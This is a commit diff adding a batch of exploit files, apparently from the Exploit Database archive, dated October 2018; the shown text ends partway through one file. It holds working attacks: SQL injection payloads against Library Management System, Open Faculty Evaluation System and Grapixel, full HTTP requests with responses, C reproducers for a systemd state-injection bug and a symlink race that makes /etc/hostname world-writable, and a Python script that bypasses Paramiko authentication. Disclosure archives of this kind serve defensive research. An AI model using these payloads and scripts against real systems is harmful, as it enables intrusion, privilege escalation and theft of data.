DB: 2018-10-30
33 changes to exploits/shellcodes Navicat 12.0.29 - 'SSH' Denial of Service (PoC) AlienIP 2.41 - Denial of Service (PoC) Local Server 1.0.9 - Denial of Service (PoC) systemd - reexec State Injection systemd - chown_one() can Dereference Symlinks ASRock Drivers - Privilege Escalation Modbus Slave 7.0.0 - Denial of Service (PoC) School Equipment Monitoring System 1.0 - 'login' SQL Injection Modbus Slave PLC 7 - '.msw' Buffer Overflow (PoC) Paramiko 2.4.1 - Authentication Bypass Open Faculty Evaluation System 5.6 - 'batch_name' SQL Injection Grapixel New Media 2 - 'pageref' SQL Injection Library Management System 1.0 - 'frmListBooks' SQL Injection Open Faculty Evaluation System 7 - 'batch_name' SQL Injection Card Payment 1.0 - Cross-Site Request Forgery (Update Admin) MTGAS MOGG Web Simulator Script - SQL Injection Aplaya Beach Resort Online Reservation System 1.0 - SQL Injection / Cross-Site Request Forgery Curriculum Evaluation System 1.0 - SQL Injection Bakeshop Inventory System in VB.Net and MS Access Database 1.0 - SQL Injection Point of Sales (POS) in VB.Net MySQL Database 1.0 - SQL Injection School Event Management System 1.0 - SQL Injection School Event Management System 1.0 - Arbitrary File Upload School Event Management System 1.0 - Cross-Site Request Forgery (Update Admin) School Attendance Monitoring System 1.0 - Cross-Site Request Forgery (Update Admin) School Attendance Monitoring System 1.0 - Arbitrary File Upload School Attendance Monitoring System 1.0 - SQL Injection PayPal-Credit Card-Debit Card Payment 1.0 - SQL Injection RhinOS CMS 3.x - Arbitrary File Download E-Negosyo System 1.0 - SQL Injection SaltOS Erp Crm 3.1 r8126 - SQL Injection SaltOS Erp Crm 3.1 r8126 - SQL Injection (2) SaltOS Erp Crm 3.1 r8126 - Database File Download K-iwi Framework 1775 - SQL Injection
This commit is contained in:
parent
bbbf700308
commit
15b77b5965
34 changed files with 2764 additions and 0 deletions
55
exploits/aspx/webapps/45706.vb
Normal file
55
exploits/aspx/webapps/45706.vb
Normal file
|
@ -0,0 +1,55 @@
|
|||
# Exploit Title: Library Management System 1.0 - 'frmListBooks' SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 2018-10-29
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Vendor Homepage: https://www.sourcecodester.com/users/janobe
|
||||
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/librarymanagementsystem.zip
|
||||
# Version: 1.0
|
||||
# Category: Windows
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2018-18796
|
||||
|
||||
# POC:
|
||||
# 1)
|
||||
# textSearch System.Windows.Forms.TextBox / [SQL]
|
||||
#
|
||||
# %' And (SElecT 112 FRom(SELECT CoUNT(*),conCAT((SELecT (ELT(112=112,1))),CONCAT_WS(0x203a20,USEr(),DATABASE(),VERsiON()),FLOOR(RAnD(0)*2))x FRoM INFORmaTION_SCHeMA.PLuGINS GRoUP BY x)a) AnD'%'='
|
||||
#
|
||||
# https://1.bp.blogspot.com/-8FBYHFTLhhQ/W9YnCQg0nZI/AAAAAAAAENM/St0sn1IYjDs5kTjvYQNtT_mBmOEv-RaIgCLcBGAs/s1600/sql1.png
|
||||
#
|
||||
#[PATH]/forms/frmListofBooks.vb
|
||||
#...
|
||||
|
||||
Public Class frmListBooks
|
||||
|
||||
Private Sub frmListBooks_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
|
||||
sql = "SELECT `AccessionNo`, `BookTitle`, `BookDesc` as 'Description', `Author`, `PublishDate`, `BookPublisher`, `Category`,BookType as 'typeOfBooks', `BookPrice` as 'Price', DeweyDecimal " & _
|
||||
", Status FROM `tblbooks` b, `tblcategory` c WHERE b.`CategoryId`=c.`CategoryId` "
|
||||
reloadDtg(sql, dtgList)
|
||||
End Sub
|
||||
|
||||
Private Sub txtSerach_TextChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles txtSearch.TextChanged
|
||||
sql = "SELECT `AccessionNo`, `BookTitle`, `BookDesc` as 'Description', `Author`, `PublishDate`, `BookPublisher`, `Category`,BookType as 'typeOfBooks', `BookPrice` as 'Price', DeweyDecimal " & _
|
||||
", Status FROM `tblbooks` b, `tblcategory` c WHERE b.`CategoryId`=c.`CategoryId` AND (`BookTitle` Like '%" & txtSearch.Text & "%' OR `Author` Like '%" & txtSearch.Text & "%' OR `AccessionNo` Like '%" & txtSearch.Text & "%')"
|
||||
reloadDtg(sql, dtgList)
|
||||
End Sub
|
||||
|
||||
Private Sub btnAdd_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnAdd.Click
|
||||
Try
|
||||
If dtgList.CurrentRow.Cells(10).Value = "Available" Then
|
||||
frmBorrow.txtAccesionNumBorrow.Text = dtgList.CurrentRow.Cells(0).Value
|
||||
Me.Close()
|
||||
Else
|
||||
MsgBox("The book is already borrowed.", MsgBoxStyle.Exclamation)
|
||||
|
||||
End If
|
||||
Catch ex As Exception
|
||||
|
||||
End Try
|
||||
|
||||
End Sub
|
||||
|
||||
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
|
||||
Me.Close()
|
||||
End Sub
|
||||
End Class
|
159
exploits/linux/dos/45714.c
Normal file
159
exploits/linux/dos/45714.c
Normal file
|
@ -0,0 +1,159 @@
|
|||
/*
|
||||
[I am sending this bug report to Ubuntu, even though it's an upstream
|
||||
bug, as requested at
|
||||
https://github.com/systemd/systemd/blob/master/docs/CONTRIBUTING.md#security-vulnerability-reports
|
||||
.]
|
||||
|
||||
When systemd re-executes (e.g. during a package upgrade), state is
|
||||
serialized into a memfd before the execve(), then reloaded after the
|
||||
execve(). Serialized data is stored as text, with key-value pairs
|
||||
separated by newlines. Values are escaped to prevent control character
|
||||
injection.
|
||||
|
||||
Lines associated with a systemd unit are read in unit_deserialize()
|
||||
using fgets():
|
||||
|
||||
char line[LINE_MAX], *l, *v;
|
||||
[...]
|
||||
if (!fgets(line, sizeof(line), f)) {
|
||||
if (feof(f))
|
||||
return 0;
|
||||
return -errno;
|
||||
}
|
||||
|
||||
LINE_MAX is 2048:
|
||||
|
||||
/usr/include/bits/posix2_lim.h:#define LINE_MAX _POSIX2_LINE_MAX
|
||||
/usr/include/bits/posix2_lim.h:#define _POSIX2_LINE_MAX 2048
|
||||
|
||||
|
||||
When fgets() encounters overlong input, it behaves dangerously. If a
|
||||
line is more than 2047 characters long, fgets() will return the first
|
||||
2047 characters and leave the read cursor in the middle of the
|
||||
overlong line. Then, when fgets() is called the next time, it
|
||||
continues to read data from offset 2047 in the line as if a new line
|
||||
started there. Therefore, if an attacker can inject an overlong value
|
||||
into the serialized state somehow, it is possible to inject extra
|
||||
key-value pairs into the serialized state.
|
||||
|
||||
A service that has `NotifyAccess != none` can send a status message to
|
||||
systemd that will be stored as a property of the service. When systemd
|
||||
re-executes, this status message is stored under the key
|
||||
"status-text".
|
||||
Status messages that are sent to systemd are received by
|
||||
manager_dispatch_notify_fd(). This function has a receive buffer of
|
||||
size NOTIFY_BUFFER_MAX==PIPE_BUF==4096.
|
||||
|
||||
Therefore, a service with `NotifyAccess != none` can trigger this bug.
|
||||
|
||||
|
||||
Reproducer:
|
||||
|
||||
Create a simple service with NotifyAccess by copying the following
|
||||
text into /etc/systemd/system/notify_test.service (assuming that your
|
||||
home directory is /home/user):
|
||||
|
||||
=========
|
||||
[Unit]
|
||||
Description=jannh test service for systemd notifications
|
||||
|
||||
[Service]
|
||||
Type=simple
|
||||
NotifyAccess=all
|
||||
FileDescriptorStoreMax=100
|
||||
User=user
|
||||
ExecStart=/home/user/test_service
|
||||
Restart=always
|
||||
|
||||
[Install]
|
||||
WantedBy=multi-user.target
|
||||
=========
|
||||
|
||||
Create a small binary that sends an overlong status when it starts up:
|
||||
|
||||
=========
|
||||
*/
|
||||
|
||||
user@ubuntu-18-04-vm:~$ cat test_service.c
|
||||
#define _GNU_SOURCE
|
||||
#include <unistd.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/un.h>
|
||||
#include <err.h>
|
||||
#include <signal.h>
|
||||
#include <stdio.h>
|
||||
|
||||
int main(void) {
|
||||
int sock = socket(AF_UNIX, SOCK_DGRAM, 0);
|
||||
if (sock == -1) err(1, "socket");
|
||||
struct sockaddr_un addr = {
|
||||
.sun_family = AF_UNIX,
|
||||
.sun_path = "/run/systemd/notify"
|
||||
};
|
||||
if (connect(sock, (struct sockaddr *)&addr, sizeof(addr))) err(1, "connect");
|
||||
|
||||
char message[0x2000] = "STATUS=";
|
||||
memset(message+7, 'X', 2048-1-12);
|
||||
strcat(message, "main-pid=13371337");
|
||||
struct iovec iov = {
|
||||
.iov_base = message,
|
||||
.iov_len = strlen(message)
|
||||
};
|
||||
union {
|
||||
struct cmsghdr cmsghdr;
|
||||
char buf[CMSG_SPACE(sizeof(struct ucred))];
|
||||
} control = { .cmsghdr = {
|
||||
.cmsg_level = SOL_SOCKET,
|
||||
.cmsg_type = SCM_CREDENTIALS,
|
||||
.cmsg_len = CMSG_LEN(sizeof(struct ucred))
|
||||
}};
|
||||
struct ucred *ucred = (void*)(control.buf + CMSG_ALIGN(sizeof(struct cmsghdr)));
|
||||
ucred->pid = getpid();
|
||||
ucred->uid = getuid();
|
||||
ucred->gid = getgid();
|
||||
struct msghdr msghdr = {
|
||||
.msg_iov = &iov,
|
||||
.msg_iovlen = 1,
|
||||
.msg_control = &control,
|
||||
.msg_controllen = sizeof(control)
|
||||
};
|
||||
if (sendmsg(sock, &msghdr, 0) != strlen(message)) err(1, "sendmsg");
|
||||
|
||||
while (1) pause();
|
||||
}
|
||||
|
||||
/*
|
||||
user@ubuntu-18-04-vm:~$ gcc -o test_service test_service.c
|
||||
user@ubuntu-18-04-vm:~$
|
||||
=========
|
||||
|
||||
Install the service, and start it. Then run strace against systemd,
|
||||
and run:
|
||||
|
||||
=========
|
||||
root@ubuntu-18-04-vm:~# systemctl daemon-reexec
|
||||
root@ubuntu-18-04-vm:~# systemctl stop notify_test.service
|
||||
=========
|
||||
|
||||
The "stop" command hangs, and you'll see the following in strace:
|
||||
|
||||
=========
|
||||
root@ubuntu-18-04-vm:~# strace -p1 2>&1 | grep 13371337
|
||||
openat(AT_FDCWD, "/proc/13371337/stat", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
|
||||
kill(13371337, SIG_0) = -1 ESRCH (No such process)
|
||||
kill(13371337, SIGTERM) = -1 ESRCH (No such process)
|
||||
=========
|
||||
|
||||
This demonstrates that systemd's representation of the service's PID
|
||||
was clobbered by the status message.
|
||||
|
||||
|
||||
This can in theory, depending on how the active services are
|
||||
configured and some other things, also be used to e.g. steal file
|
||||
descriptors that other services have stored in systemd (visible in
|
||||
the serialized representation as "fd-store-fd").
|
||||
|
||||
This isn't the only place in systemd that uses fgets(); other uses of
|
||||
fgets() should probably also be audited and potentially replaced with
|
||||
a safer function.
|
||||
*/
|
151
exploits/linux/dos/45715.txt
Normal file
151
exploits/linux/dos/45715.txt
Normal file
|
@ -0,0 +1,151 @@
|
|||
[I am sending this bug report to Ubuntu, even though it's an upstream
|
||||
bug, as requested at
|
||||
https://github.com/systemd/systemd/blob/master/docs/CONTRIBUTING.md#security-vulnerability-reports
|
||||
.]
|
||||
|
||||
When chown_one() in the recursive chown logic decides that it has to change
|
||||
ownership of a directory entry, it first changes ownership as follows:
|
||||
|
||||
if (name)
|
||||
r = fchownat(fd, name, uid, gid, AT_SYMLINK_NOFOLLOW);
|
||||
else
|
||||
r = fchown(fd, uid, gid);
|
||||
if (r < 0)
|
||||
return -errno;
|
||||
|
||||
So far, this looks good. But then this happens:
|
||||
|
||||
/* The linux kernel alters the mode in some cases of chown(). Let's undo this. */
|
||||
if (name) {
|
||||
if (!S_ISLNK(st->st_mode))
|
||||
r = fchmodat(fd, name, st->st_mode, 0);
|
||||
else /* There's currently no AT_SYMLINK_NOFOLLOW for fchmodat() */
|
||||
r = 0;
|
||||
} else
|
||||
r = fchmod(fd, st->st_mode);
|
||||
|
||||
This is dangerous, especially in the case where `name != NULL`.
|
||||
|
||||
First off: I don't think that the overall objective of this code block makes
|
||||
sense. Yes, the kernel sometimes changes the mode when ownership is changed -
|
||||
but that's only for set-UID binaries and set-GID binaries (but not
|
||||
set-GID directories).
|
||||
I'm pretty sure that setuid/setgid binaries aren't supposed to appear in these
|
||||
directories anyway.
|
||||
|
||||
The problem here is that, as the comment explains,
|
||||
`fchmodat(fd, name, st->st_mode, 0)` follows symlinks. The fchmodat() call is
|
||||
guarded by a `S_ISLNK(st->st_mode)` check, but that's obviously racy and
|
||||
therefore doesn't actually help.
|
||||
|
||||
My recommended fix is to just remove the offending code block. If, for some
|
||||
crazy reason, you actually want to support changing the ownership of
|
||||
setuid/setgid binaries, an alternative might be to do something like this:
|
||||
|
||||
int fd2 = openat(fd, name, O_PATH|O_NOFOLLOW|O_CLOEXEC);
|
||||
if (fd2 >= 0) {
|
||||
fchmod(fd2, st->st_mode);
|
||||
close(fd2);
|
||||
}
|
||||
|
||||
To reproduce, as root, create a service with "Restart=always",
|
||||
"StartLimitIntervalSec=0", "StateDirectory=test_service" and "User=user" (where
|
||||
"user" is the name of an unprivileged account). Point "ExecStart" at a binary
|
||||
that immediately exits:
|
||||
|
||||
========
|
||||
int main(void) {
|
||||
return 0;
|
||||
}
|
||||
========
|
||||
|
||||
Then start the service.
|
||||
|
||||
Next, as the user the service is running as, create some entries in
|
||||
/var/lib/test_service:
|
||||
|
||||
========
|
||||
user@ubuntu-18-04-vm:~$ cd /var/lib/test_service/
|
||||
user@ubuntu-18-04-vm:/var/lib/test_service$ touch foo
|
||||
user@ubuntu-18-04-vm:/var/lib/test_service$ chmod 0666 foo
|
||||
user@ubuntu-18-04-vm:/var/lib/test_service$ ln -s /etc/hostname foo2
|
||||
user@ubuntu-18-04-vm:/var/lib/test_service$ ln foo foo_link
|
||||
user@ubuntu-18-04-vm:/var/lib/test_service$ ls -la
|
||||
total 8
|
||||
drwxr-xr-x 2 user user 4096 Okt 8 16:42 .
|
||||
drwxr-xr-x 67 root root 4096 Okt 8 15:30 ..
|
||||
-rw-rw-rw- 2 user user 0 Okt 8 16:16 foo
|
||||
lrwxrwxrwx 1 user user 13 Okt 8 16:23 foo2 -> /etc/hostname
|
||||
-rw-rw-rw- 2 user user 0 Okt 8 16:16 foo_link
|
||||
========
|
||||
|
||||
Create and run a helper that continuously switches "foo" and "foo2" with each
|
||||
other:
|
||||
|
||||
========
|
||||
user@ubuntu-18-04-vm:~$ cat exchange.c
|
||||
#define _GNU_SOURCE
|
||||
#include <fcntl.h>
|
||||
#include <stdio.h>
|
||||
#include <unistd.h>
|
||||
#include <err.h>
|
||||
#include <sys/syscall.h>
|
||||
int main(int argc, char **argv) {
|
||||
char *base = argv[1], *p1 = argv[2], *p2 = argv[3];
|
||||
if (chdir(base)) err(1, "chdir");
|
||||
while (1) {
|
||||
if (syscall(__NR_renameat2, AT_FDCWD, p1, AT_FDCWD, p2, 2))
|
||||
perror("renameat");
|
||||
}
|
||||
}
|
||||
user@ubuntu-18-04-vm:~$ gcc -o exchange exchange.c -O2
|
||||
user@ubuntu-18-04-vm:~$ ./exchange /var/lib/test_service foo foo2
|
||||
========
|
||||
|
||||
Change ownership of "foo_link" and the test_service directory to trigger the
|
||||
permission fixup logic when the service restarts the next time:
|
||||
|
||||
========
|
||||
user@ubuntu-18-04-vm:/var/lib/test_service$ chown user:cdrom foo_link .
|
||||
========
|
||||
|
||||
Check whether it worked:
|
||||
|
||||
========
|
||||
user@ubuntu-18-04-vm:/var/lib/test_service$ ls -la /etc/hostname .
|
||||
-rw-r--r-- 1 root root 16 Jul 3 19:20 /etc/hostname
|
||||
|
||||
.:
|
||||
total 8
|
||||
drwxr-xr-x 2 user user 4096 Okt 8 16:45 .
|
||||
drwxr-xr-x 67 root root 4096 Okt 8 15:30 ..
|
||||
lrwxrwxrwx 1 user user 13 Okt 8 16:23 foo -> /etc/hostname
|
||||
-rw-rw-rw- 2 user user 0 Okt 8 16:16 foo2
|
||||
-rw-rw-rw- 2 user user 0 Okt 8 16:16 foo_link
|
||||
========
|
||||
|
||||
If it didn't work (as in this example), retry the chown a few times. After a few
|
||||
times, you should see this:
|
||||
|
||||
========
|
||||
user@ubuntu-18-04-vm:/var/lib/test_service$ ls -la /etc/hostname .
|
||||
-rw-rw-rw- 1 root root 16 Jul 3 19:20 /etc/hostname
|
||||
|
||||
.:
|
||||
total 8
|
||||
drwxr-xr-x 2 user user 4096 Okt 8 16:46 .
|
||||
drwxr-xr-x 67 root root 4096 Okt 8 15:30 ..
|
||||
-rw-rw-rw- 2 user user 0 Okt 8 16:16 foo
|
||||
lrwxrwxrwx 1 user user 13 Okt 8 16:23 foo2 -> /etc/hostname
|
||||
-rw-rw-rw- 2 user user 0 Okt 8 16:16 foo_link
|
||||
========
|
||||
|
||||
|
||||
|
||||
Another thing that might also go wrong, but that I haven't tested, is the
|
||||
interaction with the mount.ecryptfs_private helper that comes with ecryptfs.
|
||||
As far as I can tell, an attacker would be able to use mount.ecryptfs_private to
|
||||
mount an ecryptfs inside the StateDirectory. This ecryptfs instance could then
|
||||
function similar to a bind mount, causing systemd to change the ownership of
|
||||
files that are e.g. in /etc. You might want to ensure that no files or
|
||||
directories you access are located on an ecryptfs filesystem.
|
31
exploits/linux/remote/45712.py
Executable file
31
exploits/linux/remote/45712.py
Executable file
|
@ -0,0 +1,31 @@
|
|||
# Exploit Title: Paramiko 2.4.1 - Authentication Bypass
|
||||
# Date: 2018-10-27
|
||||
# Exploit Author: Adam Brown
|
||||
# Vendor Homepage: https://www.paramiko.org
|
||||
# Software Link: https://github.com/paramiko/paramiko/tree/v1.15.2
|
||||
# Version: < 1.17.6, 1.18.x < 1.18.5, 2.0.x < 2.0.8, 2.1.x < 2.1.5, 2.2.x < 2.2.3, 2.3.x < 2.3.2, and 2.4.x < 2.4.1
|
||||
# Tested on: Multiple
|
||||
# CVE : CVE-2018-7750
|
||||
|
||||
# This PoC is based on discussions found at the following github issue:
|
||||
# https://github.com/paramiko/paramiko/issues/1175
|
||||
# TLDR, Paramiko doesn't check if the client has completed the authentication step
|
||||
# before allowing the client to open channels. The PoC below connects to an SFTP
|
||||
# server, and lists the root directory without authenticating. Slight modification
|
||||
# is required if you want to open an SSH channel.
|
||||
|
||||
#!/usr/bin/python
|
||||
import paramiko
|
||||
|
||||
host = '127.0.0.1'
|
||||
port = 22
|
||||
|
||||
trans = paramiko.Transport((host, port))
|
||||
trans.start_client()
|
||||
|
||||
# If the call below is skipped, no username or password is required.
|
||||
# trans.auth_password('username', 'password')
|
||||
|
||||
sftp = paramiko.SFTPClient.from_transport(trans)
|
||||
print(sftp.listdir('/'))
|
||||
sftp.close()
|
140
exploits/php/webapps/45703.txt
Normal file
140
exploits/php/webapps/45703.txt
Normal file
|
@ -0,0 +1,140 @@
|
|||
# Exploit Title: Open Faculty Evaluation System 5.6 - 'batch_name' SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 2018-10-29
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Vendor Homepage: https://openfacultyeval.sourceforge.io/
|
||||
# Software Link: https://sourceforge.net/projects/openfacultyeval/files/feedback_php5_6.zip/download
|
||||
# Version: Php 5.6
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: N/A
|
||||
|
||||
/[PATH]/submit_feedback.php
|
||||
#....
|
||||
#17 if(isset($_POST['submit']))
|
||||
#18 {
|
||||
#19 //feedback no
|
||||
#20 $check_feedback_no="select * from batch_master where batch_id='".$_POST['']."'";
|
||||
#21 $res_feedback_no=mysql_query($check_feedback_no) or die(mysql_error());
|
||||
#22 $result=mysql_fetch_array($res_feedback_no);
|
||||
#23
|
||||
#24
|
||||
#25 $sql="select * from feedback_master where roll_no='".$_POST['roll_no']."' and b_id='".$_POST['b_name']."' and f_id='".$_POST['fac_name']."' and sub_id='".$_POST['sub_name']."' and sem_id='".$_POST['sem_name']."' and batch_id='".$_POST['batch_name']."' and division_id='".$_POST['division']."' and feedback_no='".$result['feedback_no']."'";
|
||||
#26 //echo $sql;
|
||||
#27 $res=mysql_query($sql) or die(mysql_error());
|
||||
#....
|
||||
|
||||
# POC:
|
||||
# 1)
|
||||
# http://localhost/[PATH]/submit_feedback.php
|
||||
#
|
||||
POST /[PATH]/submit_feedback.php HTTP/1.1
|
||||
Host: TARGET
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Connection: keep-alive
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 282
|
||||
batch_name=2'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&submit=Submit
|
||||
HTTP/1.1 200 OK
|
||||
Date: Mon, 29 Oct 2018 01:02:53 GMT
|
||||
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
|
||||
X-Powered-By: PHP/5.6.30
|
||||
Content-Length: 235
|
||||
Keep-Alive: timeout=5, max=100
|
||||
Connection: Keep-Alive
|
||||
Content-Type: text/html; charset=UTF-8
|
||||
|
||||
# POC:
|
||||
# 2)
|
||||
# http://localhost/[PATH]/submit_feedback.php
|
||||
#
|
||||
POST /[PATH]/submit_feedback.php HTTP/1.1
|
||||
Host: TARGET
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Connection: keep-alive
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 278
|
||||
b_name=2'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&submit=Submit
|
||||
HTTP/1.1 200 OK
|
||||
Date: Mon, 29 Oct 2018 01:15:30 GMT
|
||||
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
|
||||
X-Powered-By: PHP/5.6.30
|
||||
Content-Length: 1204
|
||||
Keep-Alive: timeout=5, max=100
|
||||
Connection: Keep-Alive
|
||||
Content-Type: text/html; charset=UTF-8
|
||||
|
||||
# POC:
|
||||
# 3)
|
||||
# http://localhost/[PATH]/submit_feedback.php
|
||||
#
|
||||
POST /[PATH]/submit_feedback.php HTTP/1.1
|
||||
Host: TARGET
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Connection: keep-alive
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 280
|
||||
sem_name=2'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&submit=Submit
|
||||
HTTP/1.1 200 OK
|
||||
Date: Mon, 29 Oct 2018 01:19:57 GMT
|
||||
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
|
||||
X-Powered-By: PHP/5.6.30
|
||||
Content-Length: 1202
|
||||
Keep-Alive: timeout=5, max=100
|
||||
Connection: Keep-Alive
|
||||
Content-Type: text/html; charset=UTF-8
|
||||
|
||||
# POC:
|
||||
# 4)
|
||||
# http://localhost/[PATH]/submit_feedback.php
|
||||
#
|
||||
POST /[PATH]/submit_feedback.php HTTP/1.1
|
||||
Host: TARGET
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Connection: keep-alive
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 280
|
||||
division=2'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&submit=Submit
|
||||
HTTP/1.1 200 OK
|
||||
Date: Mon, 29 Oct 2018 01:23:11 GMT
|
||||
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
|
||||
X-Powered-By: PHP/5.6.30
|
||||
Content-Length: 1202
|
||||
Keep-Alive: timeout=5, max=100
|
||||
Connection: Keep-Alive
|
||||
Content-Type: text/html; charset=UTF-8
|
||||
|
||||
# POC:
|
||||
# 5)
|
||||
# http://localhost/[PATH]/submit_feedback.php
|
||||
#
|
||||
POST /[PATH]/submit_feedback.php HTTP/1.1
|
||||
Host: TARGET
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Connection: keep-alive
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 279
|
||||
roll_no=2'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&submit=Submit
|
||||
HTTP/1.1 200 OK
|
||||
Date: Mon, 29 Oct 2018 01:29:20 GMT
|
||||
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
|
||||
X-Powered-By: PHP/5.6.30
|
||||
Content-Length: 1203
|
||||
Keep-Alive: timeout=5, max=100
|
||||
Connection: Keep-Alive
|
||||
Content-Type: text/html; charset=UTF-8
|
24
exploits/php/webapps/45704.txt
Normal file
24
exploits/php/webapps/45704.txt
Normal file
|
@ -0,0 +1,24 @@
|
|||
# Exploit Title: Grapixel New Media 2 - 'pageref' SQL Injection
|
||||
# Exploit Author: Berk Dusunur
|
||||
# Google Dork: N/A
|
||||
# Type: Web App
|
||||
# Date: 2018-10-26
|
||||
# Vendor Homepage: http://www.grapixel.com
|
||||
# Software Link: http://www.grapixel.com
|
||||
# Affected Version: v2
|
||||
# Tested on: MacosX
|
||||
# CVE : N/A
|
||||
|
||||
#Proof Of Concept
|
||||
# Time-Based sql injection is called a data extraction event with request response times
|
||||
# with the server when there is no other way for it to extract aggressive data. It should
|
||||
# be determined by sql injection type. I discovered blind time-based sql injection.
|
||||
# Because single quotes didn't break the page structure, so I tried to get results
|
||||
# using waitfor delay instead.
|
||||
|
||||
http://target/pages.aspx?pageref=[SQL]
|
||||
http://target/pages.aspx?pageref=' waitfor delay '00:00:05'--;
|
||||
http://target/pages.aspx?pageref=';IF(UNICODE(SUBSTRING((SELECT DB_NAME(12)),1,1))>80) WAITFOR DELAY '0:0:5'--
|
||||
http://target/pages.aspx?pageref=';IF(UNICODE(SUBSTRING((SELECT DB_NAME(12)),1,1))>81) WAITFOR DELAY '0:0:5'--
|
||||
|
||||
Ascii equivalent of 80,81 figures The first database, wait 5 seconds if the first letter is "p"
|
147
exploits/php/webapps/45707.txt
Normal file
147
exploits/php/webapps/45707.txt
Normal file
|
@ -0,0 +1,147 @@
|
|||
# Exploit Title: Open Faculty Evaluation System 7 - 'batch_name' SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 2018-10-29
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Vendor Homepage: https://openfacultyeval.sourceforge.io/
|
||||
# Software Link: https://sourceforge.net/projects/openfacultyeval/files/feedback_php7.zip/download
|
||||
# Version: Php 7
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: N/A
|
||||
|
||||
/[PATH]/submit_feedback.php
|
||||
#....
|
||||
#15 include("includes/config_db.php");
|
||||
#16
|
||||
#17 if(isset($_POST['submit']))
|
||||
#18 {
|
||||
#19 //feedback no
|
||||
#20 $check_feedback_no="select * from batch_master where batch_id='".$_POST['batch_name']."'";
|
||||
#21 $res_feedback_no=mysqli_query($conn, $check_feedback_no) or die(mysqli_error($conn));
|
||||
#22 $result=mysqli_fetch_array($res_feedback_no);
|
||||
#23
|
||||
#24
